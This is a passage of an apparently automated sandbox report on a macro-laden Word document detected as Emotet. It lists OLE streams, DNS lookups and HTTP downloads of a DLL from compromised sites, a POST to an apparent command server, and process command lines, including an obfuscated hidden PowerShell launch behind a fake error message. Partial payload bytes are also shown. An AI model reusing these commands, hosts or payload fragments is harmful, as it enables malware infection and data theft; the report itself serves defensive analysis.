                                                    Set iHKuDmaEr = Nothing
                                                    iHKuDmaEr:
                                                    End Function
                                                    VBA File Name: Zdjtk46nm17voo, Stream Size: 701
                                                    General
                                                    Stream Path: Macros/VBA/Zdjtk46nm17voo
                                                    VBA File Name: Zdjtk46nm17voo
                                                    Stream Size: 701

                                                    VBA Code Keywords

                                                    Keyword
                                                    Attribute
                                                    VB_Name
                                                    VBA Code
                                                    Attribute VB_Name = "Zdjtk46nm17voo"

                                                    Streams

                                                    Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                                    General
                                                    Stream Path: \x1CompObj
                                                    File Type: data
                                                    Stream Size: 146
                                                    Entropy: 4.00187355764
                                                    Base64 Encoded: False
                                                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                    General
                                                    Stream Path: \x5DocumentSummaryInformation
                                                    File Type: data
                                                    Stream Size: 4096
                                                    Entropy: 0.280929556603
                                                    Base64 Encoded: False
                                                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 528
                                                    General
                                                    Stream Path: \x5SummaryInformation
                                                    File Type: data
                                                    Stream Size: 528
                                                    Entropy: 4.01269144052
                                                    Base64 Encoded: False
                                                    Stream Path: 1Table, File Type: data, Stream Size: 6412
                                                    General
                                                    Stream Path: 1Table
                                                    File Type: data
                                                    Stream Size: 6412
                                                    Entropy: 6.14518057053
                                                    Base64 Encoded: True
                                                    Stream Path: Data, File Type: data, Stream Size: 99192
                                                    General
                                                    Stream Path: Data
                                                    File Type: data
                                                    Stream Size: 99192
                                                    Entropy: 7.3901039161
                                                    Base64 Encoded: True
                                                    Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 524
                                                    General
                                                    Stream Path: Macros/PROJECT
                                                    File Type: ASCII text, with CRLF line terminators
                                                    Stream Size: 524
                                                    Entropy: 5.52955915132
                                                    Base64 Encoded: True
                                                    Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 149
                                                    General
                                                    Stream Path: Macros/PROJECTwm
                                                    File Type: data
                                                    Stream Size: 149
                                                    Entropy: 3.96410774314
                                                    Base64 Encoded: False
                                                    Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5216
                                                    General
                                                    Stream Path: Macros/VBA/_VBA_PROJECT
                                                    File Type: data
                                                    Stream Size: 5216
                                                    Entropy: 5.49741129349
                                                    Base64 Encoded: True
                                                    Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 675
                                                    General
                                                    Stream Path: Macros/VBA/dir
                                                    File Type: data
                                                    Stream Size: 675
                                                    Entropy: 6.39671072877
                                                    Base64 Encoded: True
                                                    Stream Path: WordDocument, File Type: data, Stream Size: 21038
                                                    General
                                                    Stream Path: WordDocument
                                                    File Type: data
                                                    Stream Size: 21038
                                                    Entropy: 4.09747048154
                                                    Base64 Encoded: True

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                    01/06/21-08:36:59.199071 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable |  |  | 192.168.2.22 | 8.8.8.8
                                                    01/06/21-08:37:00.203089 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable |  |  | 192.168.2.22 | 8.8.8.8

                                                    Network Port Distribution

                                                    TCP Packets


                                                    UDP Packets


                                                    ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Jan 6, 2021 08:36:59.199070930 CET | 192.168.2.22 | 8.8.8.8 | d00a | (Port unreachable) | Destination Unreachable
Jan 6, 2021 08:37:00.203088999 CET | 192.168.2.22 | 8.8.8.8 | d00a | (Port unreachable) | Destination Unreachable

                                                    DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 6, 2021 08:36:55.091664076 CET | 192.168.2.22 | 8.8.8.8 | 0xfc39 | Standard query (0) | wpsapk.com | A (IP address) | IN (0x0001)
Jan 6, 2021 08:36:55.313417912 CET | 192.168.2.22 | 8.8.8.8 | 0x9175 | Standard query (0) | sofsuite.com | A (IP address) | IN (0x0001)
Jan 6, 2021 08:36:55.605438948 CET | 192.168.2.22 | 8.8.8.8 | 0xc6cc | Standard query (0) | veterinariadrpopui.com | A (IP address) | IN (0x0001)
Jan 6, 2021 08:36:56.121351004 CET | 192.168.2.22 | 8.8.8.8 | 0xd92d | Standard query (0) | shop.elemenslide.com | A (IP address) | IN (0x0001)
Jan 6, 2021 08:36:57.130614996 CET | 192.168.2.22 | 8.8.8.8 | 0xd92d | Standard query (0) | shop.elemenslide.com | A (IP address) | IN (0x0001)
Jan 6, 2021 08:36:58.144870996 CET | 192.168.2.22 | 8.8.8.8 | 0xd92d | Standard query (0) | shop.elemenslide.com | A (IP address) | IN (0x0001)
Jan 6, 2021 08:36:58.196563959 CET | 192.168.2.22 | 8.8.8.8 | 0x62a5 | Standard query (0) | khanhhoahomnay.net | A (IP address) | IN (0x0001)

                                                    DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 6, 2021 08:36:55.147933006 CET | 8.8.8.8 | 192.168.2.22 | 0xfc39 | No error (0) | wpsapk.com |  | 104.18.61.59 | A (IP address) | IN (0x0001)
Jan 6, 2021 08:36:55.147933006 CET | 8.8.8.8 | 192.168.2.22 | 0xfc39 | No error (0) | wpsapk.com |  | 104.18.60.59 | A (IP address) | IN (0x0001)
Jan 6, 2021 08:36:55.147933006 CET | 8.8.8.8 | 192.168.2.22 | 0xfc39 | No error (0) | wpsapk.com |  | 172.67.141.14 | A (IP address) | IN (0x0001)
Jan 6, 2021 08:36:55.486767054 CET | 8.8.8.8 | 192.168.2.22 | 0x9175 | No error (0) | sofsuite.com |  | 104.27.145.251 | A (IP address) | IN (0x0001)
Jan 6, 2021 08:36:55.486767054 CET | 8.8.8.8 | 192.168.2.22 | 0x9175 | No error (0) | sofsuite.com |  | 172.67.158.72 | A (IP address) | IN (0x0001)
Jan 6, 2021 08:36:55.486767054 CET | 8.8.8.8 | 192.168.2.22 | 0x9175 | No error (0) | sofsuite.com |  | 104.27.144.251 | A (IP address) | IN (0x0001)
Jan 6, 2021 08:36:55.771003962 CET | 8.8.8.8 | 192.168.2.22 | 0xc6cc | No error (0) | veterinariadrpopui.com |  | 209.59.139.39 | A (IP address) | IN (0x0001)
Jan 6, 2021 08:36:58.179588079 CET | 8.8.8.8 | 192.168.2.22 | 0xd92d | Server failure (2) | shop.elemenslide.com | none | none | A (IP address) | IN (0x0001)
Jan 6, 2021 08:36:58.547627926 CET | 8.8.8.8 | 192.168.2.22 | 0x62a5 | No error (0) | khanhhoahomnay.net |  | 210.86.239.69 | A (IP address) | IN (0x0001)
Jan 6, 2021 08:36:59.198977947 CET | 8.8.8.8 | 192.168.2.22 | 0xd92d | Server failure (2) | shop.elemenslide.com | none | none | A (IP address) | IN (0x0001)
Jan 6, 2021 08:37:00.203015089 CET | 8.8.8.8 | 192.168.2.22 | 0xd92d | Server failure (2) | shop.elemenslide.com | none | none | A (IP address) | IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • wpsapk.com
                                                    • sofsuite.com
                                                    • veterinariadrpopui.com
                                                    • khanhhoahomnay.net
                                                    • 5.2.136.90

                                                    HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 104.18.61.59 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
Jan 6, 2021 08:36:55.231106043 CET | 0 | OUT | GET /wp-admin/v/ HTTP/1.1
Host: wpsapk.com
Connection: Keep-Alive
Jan 6, 2021 08:36:55.301549911 CET | 1 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 06 Jan 2021 07:36:55 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Set-Cookie: __cfduid=d9976cc72e1611881ea7b58828e16c6881609918615; expires=Fri, 05-Feb-21 07:36:55 GMT; path=/; domain=.wpsapk.com; HttpOnly; SameSite=Lax
                                                    X-Frame-Options: SAMEORIGIN
                                                    cf-request-id: 077839a6e30000c78d1103e000000001
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Y2%2BS6cr%2FmbhAwHl6TWKd1rJu99fjtlWjdX5L9rDuig7gd%2FUwm5as04FJCVVBW3%2FSnVzUreoM7ErEDWsXV5BJoTcVYoBME9dG5ZFC"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 60d3c55168f4c78d-AMS
                                                    Data Ascii: 10d4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-widt


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49166 | 104.27.145.251 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
Jan 6, 2021 08:36:55.538140059 CET | 6 | OUT | GET /wp-includes/2jm3nIk/ HTTP/1.1
Host: sofsuite.com
Connection: Keep-Alive
Jan 6, 2021 08:36:55.597255945 CET | 7 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 06 Jan 2021 07:36:55 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Set-Cookie: __cfduid=db3ff3f511400f0a7486533388d0a5d301609918615; expires=Fri, 05-Feb-21 07:36:55 GMT; path=/; domain=.sofsuite.com; HttpOnly; SameSite=Lax
                                                    X-Frame-Options: SAMEORIGIN
                                                    cf-request-id: 077839a8170000410e7fa99000000001
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=VK1SguZ9ZuqG4MHbsjZ0Hwii3Ago%2BKB1nK8KlN9tvXa11ieLvzucb5z53qqLp0gYWFchuhRkTy9Cdl8xq6%2BXEIyAlDHhejTjNv%2Fr990%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 60d3c5535a71410e-PRG
                                                    Data Ascii: 10dd<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=devic


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49167 | 209.59.139.39 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
Jan 6, 2021 08:36:55.931899071 CET | 12 | OUT | GET /content/5f18Q/ HTTP/1.1
Host: veterinariadrpopui.com
Connection: Keep-Alive
Jan 6, 2021 08:36:56.093039036 CET | 13 | IN | HTTP/1.1 500 Internal Server Error
                                                    Date: Wed, 06 Jan 2021 07:36:56 GMT
                                                    Server: Apache
                                                    Content-Length: 7309
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>509 Bandwidth Limit Exceeded</TITLE></HEAD><BODY><H1>Bandwidth Limit Exceeded</H1>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.22 | 49168 | 210.86.239.69 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
Jan 6, 2021 08:36:58.814183950 CET | 21 | OUT | GET /wordpress/CGMC/ HTTP/1.1
Host: khanhhoahomnay.net
Connection: Keep-Alive
Jan 6, 2021 08:36:59.089220047 CET | 22 | IN | HTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Wed, 06 Jan 2021 07:36:59 GMT
                                                    Content-Type: application/octet-stream
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Keep-Alive: timeout=60
                                                    X-Powered-By: PHP/7.4.9
                                                    Set-Cookie: 5ff5689b185d4=1609918619; expires=Wed, 06-Jan-2021 07:37:59 GMT; Max-Age=60; path=/
                                                    Cache-Control: no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    Last-Modified: Wed, 06 Jan 2021 07:36:59 GMT
                                                    Expires: Wed, 06 Jan 2021 07:36:59 GMT
                                                    Content-Disposition: attachment; filename="rJGdausK.dll"
                                                    Content-Transfer-Encoding: binary
                                                    Data Ascii: 1dd7MZ@!L!This program cannot be run in DOS mode.$:wTwTwTwTwTwT-wT-wTwUSwT-wTwTwTwTwwTwTRichwTPEL_!JE0P 8@.text `.rdataJL@@.data- @.rsrc P@@.relocH@B
                                                    Jan 6, 2021 08:36:59.089350939 CET32INData Raw: f0 85 f6 78 45 83 7d e4 02 75 3f 8b 43 1c 8d 55 d0 52 0f 57 c0 8d 55 e8 66 0f d6 45 d0 66 0f d6 45 d8 8b 08 52 50 ff 51 14 8b f0 85 f6 78 1b 8d 45 d0 50 8d 45 e8 50 8b cb e8 27 00 00 00 8b f0 8d 45 d0 50 ff 15 b0 d1 00 10 47 85 f6 79 86 8b c6 8b
                                                    Data Ascii: xE}u?CURWUfEfERPQxEPEP'EPGyM_^3[]UHX!3ESVuW}hjP?hPVxPWdCRPv
                                                    Jan 6, 2021 08:36:59.089368105 CET33INData Raw: 00 83 c4 10 85 c0 78 0b 3d ff 01 00 00 77 04 75 0d eb 05 be 7a 00 07 80 33 c0 66 89 45 fa 85 f6 0f 88 84 00 00 00 ff 75 18 ff 15 a0 d0 00 10 03 c0 50 ff 75 18 8d 85 fc fb ff ff 6a 01 ff b5 f4 fb ff ff 50 53 ff 15 00 d0 00 10 8b f0 85 f6 7e 0b 0f
                                                    Data Ascii: x=wuz3fEuPujPS~xLju=jh|WthWuhWtjM_^3[R]UX!3EES]VEW}
                                                    Jan 6, 2021 08:36:59.354291916 CET35INData Raw: 5e 10 83 e9 30 66 0f 6f 46 20 66 0f 6f 6e 30 8d 76 30 83 f9 30 66 0f 6f d3 66 0f 3a 0f d9 08 66 0f 7f 1f 66 0f 6f e0 66 0f 3a 0f c2 08 66 0f 7f 47 10 66 0f 6f cd 66 0f 3a 0f ec 08 66 0f 7f 6f 20 8d 7f 30 7d b7 8d 76 08 eb 56 66 0f 6f 4e fc 8d 76
                                                    Data Ascii: ^0foF fon0v00fof:ffof:fGfof:fo 0}vVfoNvfo^0foF fon0v00fof:ffof:fGfof:fo 0}v|ovfsvs~vf;u


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    4 | 192.168.2.22 | 49169 | 5.2.136.90 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 6, 2021 08:37:12.901599884 CET | 221 | OUT | POST /9ormjijma/sd2xibclmrp5oftlrxf/ HTTP/1.1
                                                    DNT: 0
                                                    Referer: 5.2.136.90/9ormjijma/sd2xibclmrp5oftlrxf/
                                                    Content-Type: multipart/form-data; boundary=-------------qEVZIKHrPRVz2
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                    Host: 5.2.136.90
                                                    Content-Length: 8452
                                                    Connection: Keep-Alive
                                                    Cache-Control: no-cache
                                                    Jan 6, 2021 08:37:13.743518114 CET | 231 | IN | HTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Wed, 06 Jan 2021 07:37:14 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Vary: Accept-Encoding


                                                    System Behavior

                                                    General

                                                    Start time:08:36:38
                                                    Start date:06/01/2021
                                                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    Wow64 process (32bit):false
                                                    Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                    Imagebase:0x13fbb0000
                                                    File size:1424032 bytes
                                                    MD5 hash:95C38D04597050285A18F66039EDB456
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:08:36:40
                                                    Start date:06/01/2021
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD [Base64-encoded command]
                                                    Imagebase:0x4a7e0000
                                                    File size:345088 bytes
                                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate

                                                    General

                                                    Start time:08:36:40
                                                    Start date:06/01/2021
                                                    Path:C:\Windows\System32\msg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:msg user /v Word experienced an error trying to open the file.
                                                    Imagebase:0xff8a0000
                                                    File size:26112 bytes
                                                    MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate

                                                    General

                                                    Start time:08:36:41
                                                    Start date:06/01/2021
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:POwersheLL -w hidden -ENCOD [Base64-encoded command]
                                                    Imagebase:0x13f2d0000
                                                    File size:473600 bytes
                                                    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2104426345.0000000000356000.00000004.00000001.sdmp, Author: Florian Roth
                                                    • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2104546629.0000000001CC6000.00000004.00000001.sdmp, Author: Florian Roth
                                                    Reputation:high

                                                    General

                                                    Start time:08:36:48
                                                    Start date:06/01/2021
                                                    Path:C:\Windows\System32\rundll32.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                                                    Imagebase:0xff5b0000
                                                    File size:45568 bytes
                                                    MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate

                                                    General

                                                    Start time:08:36:49
                                                    Start date:06/01/2021
                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                                                    Imagebase:0x860000
                                                    File size:44544 bytes
                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2106729405.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Author: Joe Security
                                                    Reputation:moderate

                                                    General

                                                    Start time:08:36:49
                                                    Start date:06/01/2021
                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Czsbnlmzhou\heljhxhmap.nib',Control_RunDLL
                                                    Imagebase:0x860000
                                                    File size:44544 bytes
                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2108163281.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2108276475.00000000001E1000.00000020.00000001.sdmp, Author: Joe Security
                                                    Reputation:moderate

                                                    General

                                                    Start time:08:36:50
                                                    Start date:06/01/2021
                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Tshsltpdkbydgac\umncisajimhcut.zje',Control_RunDLL
                                                    Imagebase:0x860000
                                                    File size:44544 bytes
                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2109384640.00000000001D1000.00000020.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2109344000.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                                    Reputation:moderate

                                                    General

                                                    Start time:08:36:51
                                                    Start date:06/01/2021
                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Nrnhwjwgkqopncg\hahzpwlqhuedal.zvs',Control_RunDLL
                                                    Imagebase:0x860000
                                                    File size:44544 bytes
                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2111315259.0000000000271000.00000020.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2111186351.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                                    Reputation:moderate

                                                    General

                                                    Start time:08:36:51
                                                    Start date:06/01/2021
                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wcuhm\nost.bdw',Control_RunDLL
                                                    Imagebase:0x860000
                                                    File size:44544 bytes
                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2112888635.0000000000180000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2112953957.00000000001A1000.00000020.00000001.sdmp, Author: Joe Security
                                                    Reputation:moderate

                                                    General

                                                    Start time:08:36:52
                                                    Start date:06/01/2021
                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omzikkfxzmn\texvcnoeud.iob',Control_RunDLL
                                                    Imagebase:0x860000
                                                    File size:44544 bytes
                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2117427965.00000000006C1000.00000020.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2115320504.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                                    Reputation:moderate

                                                    General

                                                    Start time:08:36:53
                                                    Start date:06/01/2021
                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Afhsry\advki.tth',Control_RunDLL
                                                    Imagebase:0x860000
                                                    File size:44544 bytes
                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2118908713.00000000001E1000.00000020.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2118847844.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                                    Reputation:moderate

                                                    General

                                                    Start time:08:36:55
                                                    Start date:06/01/2021
                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Tjgkecgvqxx\dxuouhyssc.uio',Control_RunDLL
                                                    Imagebase:0x860000
                                                    File size:44544 bytes
                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2347931935.0000000000200000.00000040.00000001.sdmp, Author: Joe Security

                                                    Disassembly

                                                    Code Analysis

                                                    Call Graph

                                                    Graph

                                                    Module: A5gd21klfqu9c6rs

                                                    Declaration
                                                    Line  Content
                                                    1     Attribute VB_Name = "A5gd21klfqu9c6rs"
                                                    2     Attribute VB_Base = "1Normal.ThisDocument"
                                                    3     Attribute VB_GlobalNameSpace = False
                                                    4     Attribute VB_Creatable = False
                                                    5     Attribute VB_PredeclaredId = True
                                                    6     Attribute VB_Exposed = True
                                                    7     Attribute VB_TemplateDerived = True
                                                    8     Attribute VB_Customizable = True

                                                    Executed Functions
                                                    APIs  Meta Information

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Zw1k7hcmdl66

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Item

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Hyii7r76oq89

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: diCXTi

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: NZiApKAp

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: vrYYHIDxI

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: gzTFLxb

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: PjNhJNA

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: oAaNlB

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: sySRJ

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

